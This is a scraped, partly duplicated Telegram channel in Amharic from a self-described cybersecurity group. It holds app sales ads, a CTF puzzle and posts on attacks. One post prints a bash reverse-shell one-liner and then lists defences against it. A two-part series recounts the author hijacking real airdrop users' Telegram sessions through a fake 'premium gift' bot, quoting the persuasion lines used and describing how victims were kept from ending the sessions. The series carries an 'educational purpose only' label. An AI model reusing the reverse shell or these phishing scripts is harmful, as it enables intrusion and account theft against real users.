እንዴት ነው አጠቃቀሙ? steps)
ለአጠቃቀም በጣም ቀላል የሆኑ 3 እርምጃዎችን ብቻ ተከተሉ፦
1፦ መጀመሪያ ወደ @cipher_studios_bot ይሂዱና Start የሚለውን ይጫኑ።
ይመዝገቡ፦ ከሚመጡት አማራጮች ውስጥ Buy Access የሚለውን በመምረጥ የኢሜይል አድራሻዎን በትክክል አስገቡ።
2፦ የከፈሉበትን ደረሰኝ ፎቶ (Screenshot) ለቦቱ ላኩ። ክፍያዎ ሲረጋገጥ የኢሜይል አድራሻ እና ቁልፍ (Key) ልክ እንደዚህ ELITE-** ይላክልዎታል።
3፦ በመጨረሻም App-ኡን በመጫን የተላከልዎትን Key በማስገባት መጠቀም መጀመር ነው
ለተጨማሪ ጥያቄ በ @cipher_attack ያናግሩን።
ተደጋጋሚ ጥያቄዎች (FAQ)
1. ኢሜይል ሳስገባ የደህንነት ስጋት ቢኖርብኝስ?
የእርስዎን ግላዊነት ለመጠበቅ ሲባል መተግበሪያው ምንም አይነት የGoogle Login አይጠይቅም። ማንኛውንም በ @gmail.com የሚጨርስ የፈለጉትን የኢሜይል አድራሻ (ለምሳሌ፡ test.me@gmail.com) በመጠቀም በነጻነት መግባት ይችላሉ።
2. መረጃዎቼ ወደ ሰርቨር ይላካሉ?
በፍጹም መተግበሪያው የተሰራው Local Storage በመጠቀም ነው። ከAI ጋር የሚያደርጉት ንግግር (Prompts and Responses) በሙሉ የሚቀመጠው በራስዎ ስልክ ላይ ብቻ ነው። የእኛ ዳታቤዝ (Database) የሚያገለግለው ለምዝገባ እና ለKey ማረጋገጫ ብቻ ሲሆን ከገቡ በኋላ የእርስዎን እንቅስቃሴ አይከታተልም።
3. ስለ ስልኬ ደህንነት (Malware) እንዴት እርግጠኛ እሆናለሁ?
ፈቃድ (Permissions)፦ መተግበሪያው ከፎቶ (Photo Prompt) ውጭ ምንም አይነት አላስፈላጊ የስልክ ፈቃድ አይጠይቅም።
ፍተሻ፦ ለበለጠ መተማመን በGoogle Play Protect ወይም በማንኛውም Antivirus ስካን ማድረግ ይችላሉ።
JOIN፦ https://t.me/cipher_attacks
SHAEE፦ https://t.me/cipher_attacks

Telegram
CIPHER Cybersec
⟨ CIPHΞR ⟩
Building tools, bypassing limits.
A space for developers and security enthusiasts.
❯ InfoSec | Scripts | OSINT
» Links:
⎔ https://github.com/cipher-attack
𝕏 https://x.com/Cipher_attacks
► https://youtube.com/@cipher_attacks

👍6
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
እንደ አንድ የሲስተም አስተዳዳሪ(admin) እንደዚህ አይነት
Reverse Connection እንዳይፈጠር እንዴት መከላከል ይቻላል?#CyberSecurity #Hacking_Tutorials #EthicalHacking #Linux #Networking
👍5
CIPHER Cybersec
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1 እንደ አንድ የሲስተም አስተዳዳሪ(admin) እንደዚህ አይነት Reverse Connection እንዳይፈጠር እንዴት መከላከል ይቻላል? #CyberSecurity #Hacking_Tutorials #EthicalHacking #Linux #Networking
እንደ ሲስተም አስተዳዳሪ (System Admin) ይህንን ለመከላከልና ለመቆጣጠር የሚከተሉትን የመከላከያ እርምጃዎች መውሰድ ይችላል
• Firewall- ቁጥጥር
ይህ ዋነኛው መከላከያ ነው.
• Bash -አጠቃቀምን መገደብ
attacker የጥቃት ኮዱን የጫነው Standard User ስም ከሆነ ያ user /dev/tcp የመጠቀም permmison እንዳይኖረው ማድረግ ይቻላል.
•የ network ክትትል (Monitoring & Logging)
-Intrusion Detection Systems
-SIEM
•Least Privilege
Apache ወይም Nginx ያሉ በራሳቸው ዝቅተኛ permission ባለው ተጠቃሚ እንዲሰሩ ማድረግ
channel ን join በ ማለት እና share በ ማድረግ ትብብራችሁን አሳዩን የተለያዩ cyber እና tech ነክ ጉዳዮችን በዝርዝር የምንዳሥሥ ይሆናል.

እና ሌሎችም መንገዶች አሉ በ ዋናነት ግን ይሄን መጥቀስ እንችላለን
channel ን join በ ማለት እና share በ ማድረግ ትብብራችሁን አሳዩን የተለያዩ cyber እና tech ነክ ጉዳዮችን በዝርዝር የምንዳሥሥ ይሆናል.
Telegram
CIPHER Cybersec
⟨ CIPHΞR ⟩
Building tools, bypassing limits.
A space for developers and security enthusiasts.
❯ InfoSec | Scripts | OSINT
» Links:
⎔ https://github.com/cipher-attack
𝕏 https://x.com/Cipher_attacks
► https://youtube.com/@cipher_attacks
Building tools, bypassing limits.
A space for developers and security enthusiasts.
❯ InfoSec | Scripts | OSINT
» Links:
⎔ https://github.com/cipher-attack
𝕏 https://x.com/Cipher_attacks
► https://youtube.com/@cipher_attacks
👍6
hacking ላይ ብዙዎቻችሁ እንዴት ነው social enginnering ከ ሌሎች የሚበልጠው እንዴትስ ነው የሚጠለፈው? ብላችሁ ታስባላችሁ። ግን ጥቃቱ የሚጀምረው ከኮምፒውተር ሳይሆን ከሰው ጭንቅላት ነው።
በቅርቡ በሰራሁት Test ያረጋገጥኩት ነገር ቢኖር፦ ሰው "ነፃ(free)" ነገር እና "Official" የሚል ቃል ካየ አእምሮው መስራት ዎይም መጠራጠር ያቆማል። ለምሳሌ በነፃ Telegram Premium እና Airdrop ስም የተላከለትን link ከፍቶ የሚላክለትን ኮድ ሳያነብ የሚሰጥ ሰው ሞልቷል።
የሚያሳዝነው ደግሞ ኮዱን የሰጡት ሰዎች Hack እየተደረጉ መሆኑን እንኳ አያውቁም ትንሽ እውቀቱ ያላቸው ደግሞ እንደተደረጉ ይገባቸዋል ግን ከዚያ በኃላ እራሱ ይሄማ ለዚህ ነው ሲባሉ ያምናሉ ። ይሄ የቴክኒክ ችግር ሳይሆን የ Social Engineering ውጤት ነው ያንድን ሰው telegram እንዲሁ በ script ዎይም በሌላ ክፍተት ተጠቅሞ hack እናድርግ ቢባል telegram ን መመርመር እና ቀዳዳ መፈልግ ግድ ይሆን ነበር ግን social engineering ላይ የ ሰውየው ክፍተት ብቻ በቂ ነው እሱን መምራት መቻል ብቻ ።
ዝርዝር ዘዴውን እና መከላከያውን በሚቀጥለው በትንሹም ቢሆን አሳያችኋለሁ እስከዛው share አድርጉ
𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks

👍7❤2
ባለፈው ስለ Social Engineering ጥቃት ምንነት እና ለምን ከቴክኒክ ጥቃት የበለጠ አደገኛ እንደሆነ በተወሰነ መልኩ አይተናል
ሰው እንዴት በተለያዩ ቃላት በቀላሉ እንደሚታለልም አስረድቼ ነበር ዛሬ ደግሞ ባለፈው እንዳልኩት እንዴት ነው ሰዎችን በዚህ ዘዴ የምናጠቃው ? የሚለውን እንይ
•ጥቃቱ እንዴት ይፈጸማል❔
1.ዋናው የሰውን ልጅ ስነልቦና መጠቀም ነው ለምሳሌ እና በ ዋነኝነት Phishing Links (አሳሳች link) መላክ ነው።
እንዴት❔
እሺ ከፋፍዬ በምሳሌ ላስረዳችሁ:-
1. ሰዎች የሚፈልጉትን ቃላት ለምሣሌ ነፃ ስጦታዎች ወይም ቅናሾች በማቅረብ ለምሳሌ ባለፈው እንዳልኩት ነፃ ቴሌግራም ፕሪሚየም
1.የሆነ bot ከፈትኩ session ለመጥለፍ የሚያገለግል ስሙን unlimited premium gift አልኩት.
2.የመጣልኝ airdrop የሚሰሩ ሰውች ናቸው ለምን ካላችሁኝ ምክንያቱም እነሱ ይበልጥ የሳቡኝ ብዙ ምክንያት ነበረኝ ከሱ ውስጥ አንዱ ሁሉም ሰው በነሱ invitation code የሚገባላቸው ሰው ፍላጎቱ ነበር
3.ሁሉንም የላኩላቸው 👉"ሰላም የሆነ airdrop ግቡልኝ ስትል ነበር ግን ይከፍላል?" ነበር ምክንያቱም እኔ ያዎጣሁአቸው ከ group ላይ ምናምን link bio ላይ ምናምን ሲሉ የነበሩ ሰዎችን ነበር.
🤔ግን አስቡት አጀማመሬ "እ ሰላም bro እስኪ የሆነ airdrop start በይልኝ(በልልኝ)" ምናምን ቢሆን ምን ሊሉኝ እንደሚችሉ probability አብዛኛው ጭራሽ ሁለት ራይት እራሱ አያስበራም ነበር እንዳነበበው ላለማስነቃት ግን ለራሱ ጥቅም ለዛውም በመጠራጠር አይነት ስሜት ውስጥ ሆኘ ስጠይቀው አስቡት
3.የነሱም ምላሽ የጠበቁት ነበር በብዛት ማለት ነው ከ አንዳንድ ሰዎች በቀር ሁሉም ያሰብኩትን ነው የመለሱልኝ እናም ቀጠል አድርጌ "እሺ ግን እኔም የሆነ airdrop እየሰራሁ ነበር ይክፈል አይክፈል አላውቅም ግን እስኪ ለማንኛውም ትንሽ ሰው ነው የቀረኝ ልሞክረው ብዬ ነው start በልልኝ ቀላል ነው 1 ደቂቃ አይፈጅም ደግሞ offical ነው አልኩ ደግሞ 3 million user አለው" አልኳቸው bot ላይ ገብተው ቢያዩ እንኳን monthly user ማየት እንዳይቻል አድርጌው ስለነበር ማንም እሱን የሚያጣራ የለም በሚለው እዚህ ጋር በጅምላ ስላቸው,አልኳቸው. የምለው አብዛኛውን እንደዚሁ ስላልኳቸው ነው ካንዳንዱ በቀር.
እዚህ ጋር ደግም ልብ ማለት ያለባችሁ የሰውየውን or የሴትየዋን ምክንያት አስቀድሞ መዝጋት እና ቀላልነቱን ማሳየት በተጨማሪ ደግሞ ማሳመን ነበር.
በመጨረሻ መልሳቸው እሺ ነበር ጭራሽ ሁለት account ልግባልህ ለኔም በሌላ account ግባልኝ ያለኝ ነበር 😁
አብዛኛውን ሰው እራሴ እየመራሁ ሙሉውን session ላይ እራሱ ገብተው terminate እንዳያደርጉ ሁላ ማሳመን ችዬ ነበር ምን ያህል ክፍተት እንዳለ ልብ በሉ እና ሌሎች የቀሩ አሉ እሱን ደግሞ በቀጣይ..
ይሄን እየነገርኳችሁ ያልሁት የማያውቁ ሰዎችን እንዴት በቀላሉ ሊታለሉ ይችላሉ እና እንዴትስ ነው የሚያውቁት የሚለውን ለማስገንዘብ ነው ለሌላ ለጥፋት እንድትጠቀሙት አይደለም for
በቀጣይ ደግሞ በዚሁ ዙሪያ የቀሩንን ማጥቂያ እና መከላከያ ዘዴዎች እናዎራለን
እስከዛው 👍🙏 አድርጉባት 🫡
𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
ሰው እንዴት በተለያዩ ቃላት በቀላሉ እንደሚታለልም አስረድቼ ነበር ዛሬ ደግሞ ባለፈው እንዳልኩት እንዴት ነው ሰዎችን በዚህ ዘዴ የምናጠቃው ? የሚለውን እንይ
•ጥቃቱ እንዴት ይፈጸማል❔
1.ዋናው የሰውን ልጅ ስነልቦና መጠቀም ነው ለምሳሌ እና በ ዋነኝነት Phishing Links (አሳሳች link) መላክ ነው።
እንዴት❔
እሺ ከፋፍዬ በምሳሌ ላስረዳችሁ:-
1. ሰዎች የሚፈልጉትን ቃላት ለምሣሌ ነፃ ስጦታዎች ወይም ቅናሾች በማቅረብ ለምሳሌ ባለፈው እንዳልኩት ነፃ ቴሌግራም ፕሪሚየም
ኤርድሮፕ, ይሄን ያህል ሽልማት አሸንፈዋል በማለት link መላክ እነዚህ link ደግሞ ከታመኑ ቦታዎች ወይም ከ እራሳቸው ጉአደኛ አካውንት የተላከ በ ማስመሰል እኔ ለምሳሌ የሞከርኩት airdrop የሚሰሩ ሰዎች ላይ ነው ቀላል ነበር 1.የሆነ bot ከፈትኩ session ለመጥለፍ የሚያገለግል ስሙን unlimited premium gift አልኩት.
2.የመጣልኝ airdrop የሚሰሩ ሰውች ናቸው ለምን ካላችሁኝ ምክንያቱም እነሱ ይበልጥ የሳቡኝ ብዙ ምክንያት ነበረኝ ከሱ ውስጥ አንዱ ሁሉም ሰው በነሱ invitation code የሚገባላቸው ሰው ፍላጎቱ ነበር
3.ሁሉንም የላኩላቸው 👉"ሰላም የሆነ airdrop ግቡልኝ ስትል ነበር ግን ይከፍላል?" ነበር ምክንያቱም እኔ ያዎጣሁአቸው ከ group ላይ ምናምን link bio ላይ ምናምን ሲሉ የነበሩ ሰዎችን ነበር.
🤔ግን አስቡት አጀማመሬ "እ ሰላም bro እስኪ የሆነ airdrop start በይልኝ(በልልኝ)" ምናምን ቢሆን ምን ሊሉኝ እንደሚችሉ probability አብዛኛው ጭራሽ ሁለት ራይት እራሱ አያስበራም ነበር እንዳነበበው ላለማስነቃት ግን ለራሱ ጥቅም ለዛውም በመጠራጠር አይነት ስሜት ውስጥ ሆኘ ስጠይቀው አስቡት
3.የነሱም ምላሽ የጠበቁት ነበር በብዛት ማለት ነው ከ አንዳንድ ሰዎች በቀር ሁሉም ያሰብኩትን ነው የመለሱልኝ እናም ቀጠል አድርጌ "እሺ ግን እኔም የሆነ airdrop እየሰራሁ ነበር ይክፈል አይክፈል አላውቅም ግን እስኪ ለማንኛውም ትንሽ ሰው ነው የቀረኝ ልሞክረው ብዬ ነው start በልልኝ ቀላል ነው 1 ደቂቃ አይፈጅም ደግሞ offical ነው አልኩ ደግሞ 3 million user አለው" አልኳቸው bot ላይ ገብተው ቢያዩ እንኳን monthly user ማየት እንዳይቻል አድርጌው ስለነበር ማንም እሱን የሚያጣራ የለም በሚለው እዚህ ጋር በጅምላ ስላቸው,አልኳቸው. የምለው አብዛኛውን እንደዚሁ ስላልኳቸው ነው ካንዳንዱ በቀር.
እዚህ ጋር ደግም ልብ ማለት ያለባችሁ የሰውየውን or የሴትየዋን ምክንያት አስቀድሞ መዝጋት እና ቀላልነቱን ማሳየት በተጨማሪ ደግሞ ማሳመን ነበር.
በመጨረሻ መልሳቸው እሺ ነበር ጭራሽ ሁለት account ልግባልህ ለኔም በሌላ account ግባልኝ ያለኝ ነበር 😁
አብዛኛውን ሰው እራሴ እየመራሁ ሙሉውን session ላይ እራሱ ገብተው terminate እንዳያደርጉ ሁላ ማሳመን ችዬ ነበር ምን ያህል ክፍተት እንዳለ ልብ በሉ እና ሌሎች የቀሩ አሉ እሱን ደግሞ በቀጣይ..
ይሄን እየነገርኳችሁ ያልሁት የማያውቁ ሰዎችን እንዴት በቀላሉ ሊታለሉ ይችላሉ እና እንዴትስ ነው የሚያውቁት የሚለውን ለማስገንዘብ ነው ለሌላ ለጥፋት እንድትጠቀሙት አይደለም for
educational purpose only
በቀጣይ ደግሞ በዚሁ ዙሪያ የቀሩንን ማጥቂያ እና መከላከያ ዘዴዎች እናዎራለን
እስከዛው 👍🙏 አድርጉባት 🫡
𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
Telegram
CIPHER Cybersec
⟨ CIPHΞR ⟩
Building tools, bypassing limits.
A space for developers and security enthusiasts.
❯ InfoSec | Scripts | OSINT
» Links:
⎔ https://github.com/cipher-attack
𝕏 https://x.com/Cipher_attacks
► https://youtube.com/@cipher_attacks
Building tools, bypassing limits.
A space for developers and security enthusiasts.
❯ InfoSec | Scripts | OSINT
» Links:
⎔ https://github.com/cipher-attack
𝕏 https://x.com/Cipher_attacks
► https://youtube.com/@cipher_attacks
🙏8
TIP🎯
what is the main difference b/n
and
what is the main difference b/n
rm -rf file_name
and
shred -u file_name
👍4
CTF Question:°
የጠፈር ጣቢያችን Space Station ከማይታወቅ ምንጭ የተላከ አዲስ መልዕክት አግኝቷል። መልዕክቱ በሙሉ ቁጥር Numbers ነው።
የእኛ Crypto Analysts እንደሚሉት ከሆነ ይህ መልዕክት በ ASCII (American Standard Code for Information Interchange) የተጻፈ ነው።
ኮምፒውተሮች ፊደልን አያውቁም ለምሳሌ A ማለት ለኮምፒውተር 65 ነው። 97 ደግሞ small a ነው ።
Objective: ከዚህ በታች የተሰጠውን የቁጥር ዝርዝር List ወደ ፊደል ቀይራችሁ የተደበቀውን መልዕክት አግኙ።
INTERCEPTED DATA: [67, 73, 80, 72, 69, 82, 45, 67, 84, 70, 123, 119, 101, 108, 99, 111, 109, 101, 95, 116, 111, 95, 116, 104, 101, 95, 109, 97, 116, 114, 105, 120, 125]

•65-90 ===> (A to Z)
•97-122 ===> (a to z)
•48-57 ===> (0 to 9)
🔥4❤1
CIPHER Cybersec
Photo
ሰላም ቤተሰቦች ያው ፈተና ስለነበርኩ ምንም አይነት post ማድረግ አቁሜ ነበር inbox ም በጣም ብዙ ሰው cipher studio app እየሰራልኝ አይደለም ለምትሉ በመጀመሪያ ባለመናገሬ ይቅርታ እየጠየኩ
የጠፋው አንድ ሰው ጋር ዎይም ሁለት ሰው ጋር አይደለም ጠቅላላ በሚባል ደረጃ እየሰራ አይደለም በተለይ logout ብዬ ነዉ ያላችሁ ጋር እና ይሄን በማስተካከል ላይ እንገኛለን ያጠፋነዉም ትልቅ update ላይ ስለሆንን ነዉ በቅርቡ የሚመለስ እና እዚሁ channel ላይ ለ ሁላችሁም የሚለቀቅ ይሆናል እስከዛው ግን እንደምንም ታገሱ.
ስለ update ትንሽ ልበላችሁ :-
•መጀመሪያው እና ትልቁ ለውጥ ይሄ ነዉ እስከዛሬ የነበረው app በ typeacript የተፃፈ እና በ github workflow ዎደ app የተቀየረ ነበር እና በዛ ምክንያት ለ አንዳንድ ሥልክ እያስቸገረ ነበር እና አሁን ዎደ Kotlin ተቀይሯል
•ከዚህ በፊት ምስሉ ላይ ያሉት 6 lab ቢኖሩም አይሰራም እያላችሁ ነበር እኔንም ስትጠይቁኝ ነበር እና አሁን መልሱን እና አሁን የተደረገውን ለውጥ አያይዥ ልንገራችሁ
•የማይሰራበት ምክንያት ==> የምትጠቀሙት api ከ ai studio የዎሰዳችሁት free ነዉ ለነዚህ lab ደግሞ የተጠቀምነዉ model = gemini_PRO ነበር ያ ማለት ግዴታ የተከፈለበት(paid) api ያስፈልጋችሁ ነበር አሁን ግን
•የተደረገው ለውጥ ==> ሙሉ ላይ model ን ዎደ model = gemini_FLASH, በመቀየር ነፃ እና ፈጣን አድርገነዋል
•ከዛኛው አንፃር ፈጣን እና Smooth ነዉ!
• +ADD
=> Temprature
=>Max Length
=>Quick PreSets
=>Intellegence MODEL
╭── ~/CODE-LAB
╰─❯pop up code VIEW
╰─❯split screen view
╰─❯code view
╰─❯suggestion & undo & copy code
╰─❯phone/Tab/pc View
╭── ~/VIson-HUB
╰─❯Describe image
╰─❯OCR text
╰─❯Code ext.
╰─❯Security
╭── ~/PROMPT STUDIO
╰─❯more power full prompt type & Copy & Use butoon
╰─❯Suggestions
••••••ይቀጥላል

👍9🔥1
CIPHER Cybersec
ሰላም ቤተሰቦች ያው ፈተና ስለነበርኩ ምንም አይነት post ማድረግ አቁሜ ነበር inbox ም በጣም ብዙ ሰው cipher studio app እየሰራልኝ አይደለም ለምትሉ በመጀመሪያ ባለመናገሬ ይቅርታ እየጠየኩ የጠፋው አንድ ሰው ጋር ዎይም ሁለት ሰው ጋር አይደለም ጠቅላላ በሚባል ደረጃ እየሰራ አይደለም በተለይ logout ብዬ ነዉ ያላችሁ ጋር እና ይሄን በማስተካከል ላይ እንገኛለን ያጠፋነዉም ትልቅ update…
•••የቀጠለ
╭── ~/CYBER-HOUSE
╰─❯Ai ops
╰─Payload pattern
╰─Audit
╰─Logs analysis
╰─❯UTILS
╰─B64enc and dec
╰─URL enc and dec
╰─HEX dump
╭── ~/DATA analysis
╰─❯DATA source Visualization
╰─you paste csv,json or describe data
ex:- Q1 sales,50k,Q2,75k and other
° - ° and visualize the app
╭── ~/DOC-INTEL
╰─❯paste text drag and upload file
╰─Summerize🫧
╰─Audit Risks🧾
╰─Insights 📍
╰─contract⚖️
╰─TONE😃
•max out put length ኡን
MaXimum = 32000 አድርገነዋለን ያ ማለት ለ ትልልቅ project ባንድ ጊዜ እራሱ በጣም ከፍተኛ ነዉ
•illusion ንን ሙሉ ለሙሉ በሚባል ደረጃ ተዎግዱአል
•ላሁን የመጣልኝ ይሄ ነዉ ሌሎችም ብዙ ነገሮችን ጨምረናል እና ትንሽ ሳምንት በኃላ የምንጨርስ ይሆናል
CONTACT FOR ME
እንግዲህ ዎገንታት እነዚህን ሁሉ ይዞ የሚመለስ ይሆናል እስከዛው
𝗝𝗢𝗜𝗡 => 𝗖𝗜𝗣𝗛𝗘𝗥 𝗔𝗟𝗟 𝗜𝗡 𝗢𝗡𝗘
𝗦𝗛𝗔𝗥𝗘 => 𝗖𝗜𝗣𝗛𝗘𝗥 𝗖𝗢𝗠𝗠𝗨𝗡𝗜𝗧𝗬
𝗥𝗘𝗔𝗖𝗧𝗜𝗢𝗡=> 👍
እያደረጋችሁ

⚠️ማስጠንቀቂያ ዎደፊት ለ app መክፈል የምትፈልጉ በ security ምክንያት private የመሆን እና ዋጋው የመጨመር እድሉ በጣም ከፍተኛ ነዉ
ለበለጠ መረጃ በዚህ አዉሩኝ
CONTACT FOR ME
እንግዲህ ዎገንታት እነዚህን ሁሉ ይዞ የሚመለስ ይሆናል እስከዛው
𝗝𝗢𝗜𝗡 => 𝗖𝗜𝗣𝗛𝗘𝗥 𝗔𝗟𝗟 𝗜𝗡 𝗢𝗡𝗘
𝗦𝗛𝗔𝗥𝗘 => 𝗖𝗜𝗣𝗛𝗘𝗥 𝗖𝗢𝗠𝗠𝗨𝗡𝗜𝗧𝗬
𝗥𝗘𝗔𝗖𝗧𝗜𝗢𝗡=> 👍
እያደረጋችሁ
Telegram
∁ ℑ ℘ Ħ ℇ ℜ ⍼
⠺⠓⠁⠞ ⠙⠕ ⠽⠕⠥ ⠝⠑⠑⠙⠦
🔥4👍2
CIPHER Cybersec
ሰላም ቤተሰቦች ያው ፈተና ስለነበርኩ ምንም አይነት post ማድረግ አቁሜ ነበር inbox ም በጣም ብዙ ሰው cipher studio app እየሰራልኝ አይደለም ለምትሉ በመጀመሪያ ባለመናገሬ ይቅርታ እየጠየኩ የጠፋው አንድ ሰው ጋር ዎይም ሁለት ሰው ጋር አይደለም ጠቅላላ በሚባል ደረጃ እየሰራ አይደለም በተለይ logout ብዬ ነዉ ያላችሁ ጋር እና ይሄን በማስተካከል ላይ እንገኛለን ያጠፋነዉም ትልቅ update…
app ተሰርቶ ተጠናቋል እና first release የምለቅላችሁ ይሆናል ከትንሽ ሰዓት በኃላ እና አንድ ነገር አስቢያለሁ ቀድሞ ለመጣ 3 ት ሰው 3 day free gift እሰጣለሁ ያው የመጣችሁበት ሰዓት ይዎስነዋል እና ይሄን እንደላኩ ቀድሞ የመጣ ብቻ ነው.
=>@cipher_attack
እንዳልኩት ደግሞ ለ 3ቀን ብቻ ነው ከዚያ የማስወጣችሁ ይሆናል
ምን እንደሆነ የማታውቁ እና access መግዛት የምትፈልጉ ደግሞ ከላይ ያለውን chat አንብቡ reply ያደረኩትን

🔥6👍2
በመጨረሻም በ ጉጉት እንደጠበቃችሁት app ተጠናቋል ያው ባለፈው እንዳልኩት ለተዘጋባችሁ ይቅርታ እጠይቃለሁ እና በፊት ትጠቀሙበት በነበረው password እና email መግባት ትችላላችሁ የሚቀየር እና የሚሻሻል ነገር ካለ አሳውቁኝ ከዛ ዉጭ ግን በኔ በኩል በጣም ፈጣን እና በጣም አስደሳች ሥራ ነው በተረፈ ስልካችሁ iphone እና አንዳንድ የማይሰራላችሁ ካላችሁ በ web በኩል መጠቀም ትችላላችሁ web ክፍት ነው አሁንም
አዳዲስ ከዚህ በፊት access የሌላችሁ ደግሞ bot ለግዜው ሥራ ላይ ስላልሆነ ቀጥታ መጣችሁ አናግሩኝ የሙከራ 1 ቀን የምሰጣችሁ ይሆናል
=>DM ME FOR ACCESs<==
አዳዲስ ከዚህ በፊት access የሌላችሁ ደግሞ bot ለግዜው ሥራ ላይ ስላልሆነ ቀጥታ መጣችሁ አናግሩኝ የሙከራ 1 ቀን የምሰጣችሁ ይሆናል
=>DM ME FOR ACCESs<==
Telegram
∁ ℑ ℘ Ħ ℇ ℜ ⍼
⠺⠓⠁⠞ ⠙⠕ ⠽⠕⠥ ⠝⠑⠑⠙⠦
👍3❤1
በሀገራችን ኢትዮጵያ በቴክኖሎጂው ዘርፍ እየታዩ ያሉ ለውጦች በእውነት አስገራሚ ናቸው።
አስቡት በአፍሪካ አንደኛ በዓለም ደግሞ ሁለተኛ የሆነው የ-AI ዩኒቨርሲቲ በኢትዮጵያ እውን ሊሆን መታቀዱ የደረስንበትን የለውጥ ከፍታ በትክክል ያሳያል።
ሌላው ያስገረመኝ ደግሞ ሰው አልባ የፖሊስ ጣቢያዎች መከፈታቸው ነው ይሄ ደግሞ ሀገራችን ከዘመኑ ጋር ለመራመድ ያላትን ብቃት ብቻ ሳይሆን ለመቅደምም እየታገለች እንደሆነ ማሳያ ነው።
ግን ጥያቄው እዚህ ጋር ነው መሆን ያለበት. ቴክኖሎጂ በሰፋ ቁጥር የደህንነት ስጋቶችስ? ለዚህ ነው እኛ ንቁ መሆን ያለብን።
1.አዳዲስ የቴክኖሎጂ ውጤቶችን መጠቀም ብቻ ሳይሆን እንዴት እንደሚሰሩ መረዳት ያስፈልገናል
2.ደግሞ ዛሬ የምንወስደው እያንዳንዱ እርምጃ ለነገው ተፈላጊነታችን ትልቅ ዋጋ እንዳለው ማዎቅ አለብን አንድ ሰዓት አሁን ላይ ዋጋ አላት ከሰራንባት
ባጠቃላይ
የጀመርነው የቴክኖሎጂ ጉዞ ያዝልቅልን ባይ ነኝ

👍4❤1
Forwarded from BunaByte Cybersecurity
This media is not supported in your browser
VIEW IN TELEGRAM
😁5❤1👍1
Q_8HGJKSWKvlbOKLdTtkg_ad50d57e3f79455783a12f606c297af1_Google_Cybersecurity.docx
879.3 KB
Q__8HGJKSWKvlbOKLdTtkg_ad50d57e3f79455783a12f606c297af1_Google-Cybersecurity-Certificate-glossary.docx
👍3👏1🙏1